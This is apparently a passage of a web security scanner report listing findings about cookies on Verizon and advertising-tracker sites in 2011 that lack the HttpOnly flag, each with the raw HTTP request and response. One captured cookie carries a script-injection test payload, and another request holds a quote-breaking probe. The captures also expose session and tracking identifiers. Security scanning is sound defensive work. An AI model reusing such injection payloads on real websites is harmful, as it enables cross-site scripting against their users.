The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hc/44153975/?lpCallId=989132328424-943083492107&protV=20&lpjson=1&site=44153975&cmd=mTagKnockPage&id=2622394683&javaSupport=true&visitorStatus=INSITE_STATUS&cookie=GLOBALID%3DJHPrv0rWj7yocbPko%252BHLF8zqOnD3%252FSV22d7pwWM5O%252FNFRQcl%252By5AJJhaVp3nPNUb%3B%20%20gnVersion%3D2011Jul31030844%3B%20mbox%3Dsession%231315278939788-568601%231315280864%7CPC%231315278939788-568601.19%231316488604%7Ccheck%23true%231315279064%3B%20mybizCookie%3Dtrue%3B%20CP%3Dnull* HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/index.html?tab=business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HumanClickKEY=5253195599019031161; LivePersonID=-5110247826455-1315260966:-1:1315237110:-1:-1; HumanClickSiteContainerID_44153975=Master; LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315261001562; ASPSESSIONIDQSBSDQDT=AHDPIJCABMFOAADKOLJOBFBJ

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:16:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Set-Cookie: HumanClickACTIVE=1315261007076; expires=Tue, 06-Sep-2011 22:16:47 GMT; path=/
Content-Type: application/x-javascript
Accept-Ranges: bytes
Last-Modified: Mon, 05 Sep 2011 22:16:47 GMT
Set-Cookie: HumanClickSiteContainerID_44153975=Master; path=/hc/44153975
Set-Cookie: LivePersonID=-5110247826455-1315260966:-1:1315237110:-1:-1; expires=Tue, 04-Sep-2012 22:16:47 GMT; path=/hc/44153975; domain=.liveperson.net
Cache-Control: no-store
Pragma: no-cache
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Content-Length: 1480

lpConnLib.Process({"ResultSet": {"lpCallId":"989132328424-943083492107","lpCallConfirm":"","lpJS_Execute":[{"code_id": "webServerOverride", "js_code": "if (lpMTagConfig.lpServer != 'sales.liveperson.n
...[SNIP]...

10.90. http://search.verizon.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://search.verizon.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

v1stsp=9A1D507944409CB9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verizon.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: search.verizon.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __switchTo5x=51; __unam=49dc76-1323a4a13fb-1bbb4ff9-1; GlobalSessionID=NEScwnwaL4QccG18LnT8IJ7HQ%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:13:38 PM; AkaUTrackingID=804E8C682B3FA4D861FA571CC854E9FD; AkaSTrackingID=22240856919E5F4D120128A4C01974E7; V347=3JqCYcsE1rlAhTfmCIUyRZ-iggeiohK6a-FKkJ_aMvvIaMkdz3Ks80g; Product=A; ProductXML=A; BusinessUnit=wireless; vsrecentsearches=wss~5d89e%3cscript%3eprompt(%22POTS%22)%3c/script%3e9b63ecd16e6~~~; CP=null*

Response

HTTP/1.1 404 Not Found
Date: Mon, 05 Sep 2011 22:33:59 GMT
Server: Atomz/1.0
Set-Cookie: v1stsp=9A1D507944409CB9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.verizon.com
Content-Type: text/html; charset=iso-8859-1
Via: 1.1 center.atomz.com:90
X-Cache: MISS from center.atomz.com
Content-Length: 282

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico was not found on this server.<P>
<HR>
<ADDR
...[SNIP]...

10.91. http://servedby.flashtalking.com/segment/modify/adg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://servedby.flashtalking.com
Path:	/segment/modify/adg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

flashtalkingad1="GUID=13153E27A6C6C8|segment=(adg-t:1343)";Path=/;Domain=.flashtalking.com;Expires=Wed, 04-Sep-13 22:14:45 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /segment/modify/adg;;pixel/?name=VerizoncomHomepage&setTime&setTime=0&granularity=day HTTP/1.1
Host: servedby.flashtalking.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?
Cookie: flashtalkingad1="GUID=13153E27A6C6C8"

Response

HTTP/1.1 200 OK
Set-Cookie: flashtalkingad1="GUID=13153E27A6C6C8|segment=(adg-t:1343)";Path=/;Domain=.flashtalking.com;Expires=Wed, 04-Sep-13 22:14:45 GMT
Cache-Control: no-cache, no-store
Pragma: no-cache
P3p: policyref="/w3c/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Mon, 05 Sep 2011 22:14:45 GMT
Server: Jetty(6.1.22)
Content-Type: image/gif
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a)
Connection: keep-alive
Content-Length: 42

GIF89a.............!.......,........@..D.;

10.92. https://signin.verizon.com/sso/VOLPortalLogin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://signin.verizon.com
Path:	/sso/VOLPortalLogin

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

lob=consumer; domain=.verizon.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /sso/VOLPortalLogin HTTP/1.1
Host: signin.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.93. http://statse.webtrendslive.com/dcsi8dupuerp17vzhd59b2lwc_8u5u/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://statse.webtrendslive.com
Path:	/dcsi8dupuerp17vzhd59b2lwc_8u5u/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTE4NjkyMjk3Ni4zMDE2MjI5NAAAAAAAAAAEAAAAnPIAANYLF06dCxdO6/UAAHE1O074NDtOyg8BAEB8W05AfFtOzEsAAJFJZU6RSWVOBAAAAK1OAADWCxdOnQsXTtdPAABxNTtO+DQ7ThtTAABAfFtOQHxbTmseAACRSWVOkUllTgAAAAA-; path=/; expires=Thu, 02-Sep-2021 22:13:37 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcsi8dupuerp17vzhd59b2lwc_8u5u/dcs.gif?&dcsdat=1315278818501&dcssip=verizon.com&dcsuri=/&dcsqry=%3Faaaa=bbbb%22%3Ess%26ccc=dddd%2611111=22222&dcsref=http://www.fakereferrerdominator.com/referrerPathName%3FRefParName=RefValue&WT.tz=-5&WT.bh=22&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.js=Yes&WT.jv=1.5&WT.bs=1069x853&WT.fi=No&WT.tv=8.0.0&WT.sp=@@SPLITVALUE@@&WT.vt_f_tlv=0&WT.vt_f_tlh=0&WT.vt_f_d=1&WT.vt_f_s=1&WT.vt_f_a=1&WT.vt_f=1&WT.vt_sid=50.23.123.106-1186922976.30162294.1315278818504&WT.co_f=50.23.123.106-1186922976.30162294 HTTP/1.1
Host: statse.webtrendslive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://verizon.com/
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTE4NjkyMjk3Ni4zMDE2MjI5NAAAAAAAAAADAAAAnPIAANYLF06dCxdO6/UAAHE1O074NDtOyg8BAEB8W05AfFtOAwAAAK1OAADWCxdOnQsXTtdPAABxNTtO+DQ7ThtTAABAfFtOQHxbTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 Sep 2011 22:13:37 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtMTE4NjkyMjk3Ni4zMDE2MjI5NAAAAAAAAAAEAAAAnPIAANYLF06dCxdO6/UAAHE1O074NDtOyg8BAEB8W05AfFtOzEsAAJFJZU6RSWVOBAAAAK1OAADWCxdOnQsXTtdPAABxNTtO+DQ7ThtTAABAfFtOQHxbTmseAACRSWVOkUllTgAAAAA-; path=/; expires=Thu, 02-Sep-2021 22:13:37 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

10.94. http://statse.webtrendslive.com/dcspfpx81frp17vzhd59b2lwc_3u6z/dcs.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://statse.webtrendslive.com
Path:	/dcspfpx81frp17vzhd59b2lwc_3u6z/dcs.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAANAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAAIxLZU60SmVOz0sAANhLZU7IS2VOCAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAADYS2VOtEplTgAAAAA-; path=/; expires=Thu, 02-Sep-2021 22:23:20 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /dcspfpx81frp17vzhd59b2lwc_3u6z/dcs.gif?&dcsdat=1315279384375&dcssip=www22.verizon.com&dcsuri=/wholesale/solutions/solution/physical%2bcollo.html&dcsref=http://search.verizon.com/%3Fmarket=94531%2Bzz%26q=oss%2Bsq%26rv=b%26st=zz%26tp=c%26u1=q&WT.tz=-5&WT.bh=22&WT.ul=en-US&WT.cd=16&WT.sr=1920x1200&WT.jo=Yes&WT.ti=Verizon%20Global%20Wholesale%20|%20Physical%20Collocation&WT.js=Yes&WT.jv=1.5 HTTP/1.1
Host: statse.webtrendslive.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/wholesale/solutions/solution/physical%2bcollo.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAAMAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAAIxLZU60SmVOCAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAACMS2VOtEplTgAAAAA-

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 05 Sep 2011 22:23:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: ACOOKIE=C8ctADUwLjIzLjEyMy4xMDYtNDA4NjMyNTc2MC4zMDE3MzE5MAAAAAAAAAANAAAAVdcAADN1Xk4zdV5OUNcAAF11Xk5ddV5OLbAAABOxX05Mrl9OyOIAAK6xX05or19Ofv0AAK+xX05pr19OJfoAAKixX04bsV9OoP4AABuyX06wsV9OCJkAAMvKYk7NyWJOF7MAACmlY07WpGNOw+YAAOoWZU4sFmVO+M8AAI5FZU4uRWVOzEsAAIxLZU60SmVOz0sAANhLZU7IS2VOCAAAAPxEAABddV5OM3VeTkRFAAATsV9OTK5fTkooAAAbsl9OaK9fTggrAADLymJOzcliTvBFAAAppWNO1qRjTjFOAADqFmVOLBZlTlNLAACORWVOLkVlTmseAADYS2VOtEplTgAAAAA-; path=/; expires=Thu, 02-Sep-2021 22:23:20 GMT
P3P: CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Pragma: no-cache
Expires: -1
Cache-Control: no-cache
Content-type: image/gif
Content-Length: 67

GIF89a...................!..ADOBE:IR1.0....!.......,...........T..;

10.95. http://surround.verizon.com/Shop/Utilities/verizonyourdomain.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://surround.verizon.com
Path:	/Shop/Utilities/verizonyourdomain.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

IOOrderPg=/Shop/Utilities/verizonyourdomain.aspx; path=/
tvNodeName=Utilities          ; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Shop/Utilities/verizonyourdomain.aspx HTTP/1.1
Host: surround.verizon.com
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.net/signin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; vsrecentsearches=wss~xss~xss%20sq~~; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Date: Mon, 05 Sep 2011 22:21:43 GMT
Connection: close
Vary: Accept-Encoding
Connection: Transfer-Encoding
Set-Cookie: quhboZ2MfIRqG-pa__lcCIup88pAltrZVy8ew4aQLHKqTD3B8Z1BOKvlmqD24bzzTmCnb-zIHNG5S4jviu2h1eozOODIgWJs1Mt7wWobBpS3hC580=; path=/
Set-Cookie: IOOrderPg=/Shop/Utilities/verizonyourdomain.aspx; path=/
Set-Cookie: tvState=Y; path=/
Set-Cookie: tvNodeName=Utilities          ; path=/
Content-Length: 138234

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" >

<head>

<title>
...[SNIP]...

10.96. http://syndicate.verizon.net/ads/regionlocator.ashx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://syndicate.verizon.net
Path:	/ads/regionlocator.ashx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; domain=verizon.net; expires=Tue, 06-Sep-2011 22:18:13 GMT; path=/
POPRefid=refid=&refresh=y&reftrytime=0&refnum=; domain=verizon.net; expires=Tue, 06-Sep-2011 22:18:13 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ads/regionlocator.ashx HTTP/1.1
Host: syndicate.verizon.net
Proxy-Connection: keep-alive
Referer: http://webmail.verizon.com/signin/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: image/gif
Content-Length: 243
Date: Mon, 05 Sep 2011 22:18:40 GMT
Connection: close
Set-Cookie: POPLocation=popip=50.23.123.106&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; domain=verizon.net; expires=Tue, 06-Sep-2011 22:18:13 GMT; path=/
Set-Cookie: POPRefid=refid=&refresh=y&reftrytime=0&refnum=; domain=verizon.net; expires=Tue, 06-Sep-2011 22:18:13 GMT; path=/

GIF89a......................................................................................

.............33.)).EE.RR.ii.....................................................................yyysssYYYW
...[SNIP]...

10.97. http://tags.bluekai.com/site/4357 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tags.bluekai.com
Path:	/site/4357

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

bk=ht88uCDC+h5Mq/0A; expires=Sat, 03-Mar-2012 22:15:21 GMT; path=/; domain=.bluekai.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /site/4357?ret=html&r=77101&phint=hc3%3D%7C&phint=logInDisplay%3D1&phint=lpLanguage%3Denglish&phint=lpMarket%3Dgeneric&phint=Keywords%3DCell%20Phone%20Deals%2C%20Cell%20Phone%20Discounts%2C%20Online%20Specials%2C%20Packages&phint=bk_t%3DCell%20Phone%20Savings%20%26%20Discounts%20-%20Verizon%20Wireless&phint=bk_k%3DCell%20Phone%20Deals%2C%20Cell%20Phone%20Discounts%2C%20Online%20Specials%2C%20Packages&phint=bk_pr%3Dhttp%3A%2F%2Fwww.verizonwireless.com%2Fb2c%2Findex.html HTTP/1.1
Host: tags.bluekai.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.verizonwireless.com/b2c/promotion/specialoffers.jsp
Cookie: bk=Avt5BqOGErjMq/0A; bkc=KJh5NeNGDNWDOded0lrJoWZhi98oS1aRAyS6NWNJuBvCaGzIOjKihxyCek6fr9Q+taJud99a12QhVbWioK6inDtCG61sJDvix6PnmlxHQ+eDzN80U2I8A92IXedll7w4FSdjOyyc4UiEnBGI9WN0nQECSKFz0IEjRywk5LWmRBdhMmqbA4xfF6XTRAoqOp/dzPtS8dKbxKw4wYFRJFRzdIgmjXJ9L94Rv740O3tUF4+YIrbXBwXgPI77RpXyKUi4I+tThPfEpm+HU3Ub2UPQdwkMo8b5VoEZFw/YfVtnI+6zZ7E2ITv6EPIFrPf8iyZAuX9gL3dgj6IAF2tVgZ7mM6g4iWo7/2/XF246zUNYdqtA254e74VhpqXx4CYu8FsD8d06cNm6jGdpkFu6hbVn5J8SOg8bFvx8zY956lhP1TIFd/mSY2yOcGcfrIpR6Lh88xv5F2NdOkqx3V54KyoCpiLwC/cK3/cvClrrx8G8gppRY6pH45MmjmkXNbIyMI1x8gp0/LNliKfUy62MEMNfCdq4SXTg4bq7RPVOMDEm2PJ1ZFwvPUvRX3kLN7DZJ1N88DmSg6nFkNQhfUoW1IKPEb7d7t6e4In7qg0VfA2/NTSAhICIK1lMvfdFwgIll81tW4XONqETtQ==; bko=KJyfJLg96vIjbL4/z/meQzsNJCg/ZLEsynOPh5Kw7VWiBTEahcYSiTsCaXCijJeMCfcmzLBRF6xQnYSsmfyyLDxQbhGwuW0VMTcCCj3BcpmeJJEa0999eLDR4Q==; bkp1=; bku=kQ199JnSvDfyUEoR; bkw5=KJ0aAEWFxNWRCodgovoUDexueejB3qEWx/CK5IC9O6HP/0kdxLHW5OYdys/0ZiPZnOJJ/lb9Yn6JZ6cRhc4zb3Z6V1T8IjfFdqTlfdAR9FGXqrV0tDieHzQImTufRjdRz7P0Bso/mx8rp1BoDNJfsyBauzUfAU123zI+9QxEHC2k5+pGHbEceU7zOvs50zUsILiW5waYyRJrGkmBrtnuCUMHUHWt8dy+bPtTZ/a6hVV968xZJjU3CUlc2f2y3V+wM7ctAppdugxZ/B1DPsqVmbr42jXibKowXOCLQMecXtjfVBb64iKZSLC2hAd8YAtr1TqAJa5SwajkVQKJJDBtk7tiANaL8dNA+/X2/SbxP6FdIV1VZAPMPElf0RqLXbvrEO2xZPiL6UPHpMqI381PLp49xXfLczCgd4rUwApwZL0+fF6gLUGd7bxjCET=; bkou=KJhMRsOQRsq/pupQjE9N6e10NM1WRxmpb4IudROueYy1ZHDRAFtS3UT9BE6nNx==; bkst=KJhBEf+v9NWDwWP91aWetZGPLwcY7FrIVrQSPyCZN6i/uL9irlzUJuxH1Ri2k7bOvqVhLTiPkHXQPGodTu5T5b+15jQj8L0DTc6KcvqgmNWJw+h5Q8C8BOaVWYA0ugiUS5/pNJ9AkMEVNiS2Nsh+qpFdkdwwyUMRcT8rC+IP6aadMkGsokO0vxPcnqDVE9MpVXCl84yeE87CUcZWoSi/PiRM6ioameG/0twHLtINlw2z7F7yDaYgaR9P/YQ1SrGhxjWpoEtMI5BMyIkgYy9PbcSwg68lypTm2iXZjlrm4NZzijGVDj2n9O+x2TBtzBeLBgBsJh3xTvHNKblwO2AGeeSpP7HTPOIwnGwx2TBmdS5RAPEpYAyZ1+q1/CD357rHozAWzFtIZk59e0VEDi3rLwl3HddTzNKo; __utma=252226138.2034852110.1313672419.1313672419.1313681721.2; __utmz=252226138.1313681721.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; bklc=4e65298f; bkdc=sf

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:15:21 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP="NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV", policyref="http://tags.bluekai.com/w3c/p3p.xml"
Pragma: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Set-Cookie: bk=ht88uCDC+h5Mq/0A; expires=Sat, 03-Mar-2012 22:15:21 GMT; path=/; domain=.bluekai.com
Set-Cookie: bkdc=sf; expires=Tue, 06-Sep-2011 22:15:21 GMT; path=/; domain=.bluekai.com
BK-Server: 497b
Content-Length: 77
Content-Type: text/html

<html>
<head>
</head>
<body>
<div id="bk_exchange">

</div>

</body>
</html>

10.98. http://tap.tapad.com/audience/pxl.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tap.tapad.com
Path:	/audience/pxl.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TapAd_DID=e8460635-57b3-4d5a-a2f2-35905a4b8d5e;Path=/;Domain=.tapad.com;Expires=Fri, 04-Nov-2011 22:14:40 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /audience/pxl.png?aud_id=4DSP41 HTTP/1.1
Host: tap.tapad.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=2761768;type=consu459;cat=veriz742;ord=3888297551964.5366?
Cookie: __utma=94442777.1121161912.1313187517.1313187517.1313187517.1; __utmz=94442777.1313187517.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; TapAd_DID=e8460635-57b3-4d5a-a2f2-35905a4b8d5e

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:14:40 GMT
Set-Cookie: TapAd_DID=e8460635-57b3-4d5a-a2f2-35905a4b8d5e;Path=/;Domain=.tapad.com;Expires=Fri, 04-Nov-2011 22:14:40 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Cache-Control: private, no-cache, proxy-revalidate
Pragma: no-cache
Content-Length: 95
Content-Type: image/png
Server: Jetty(7.4.2.v20110526)

.PNG
.
...IHDR.............%.V.....PLTE....z=.....tRNS.@..f...
IDAT..c`.......!.3....IEND.B`.

10.99. http://webmail.verizon.com/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizon.com
Path:	/signin/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

webmail_ad="ad=2"; Version=1; Max-Age=86400; Expires=Tue, 06-Sep-2011 22:18:35 GMT; Path=/
lob=webmail; Domain=.verizon.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /signin/ HTTP/1.1
Host: webmail.verizon.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=.verizon.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BusinessUnit=business; vsrecentsearches=wss~xss~xss%20sq~~; BTagRequired=N

Response

10.100. http://webmail.verizon.net/signin/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://webmail.verizon.net
Path:	/signin/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

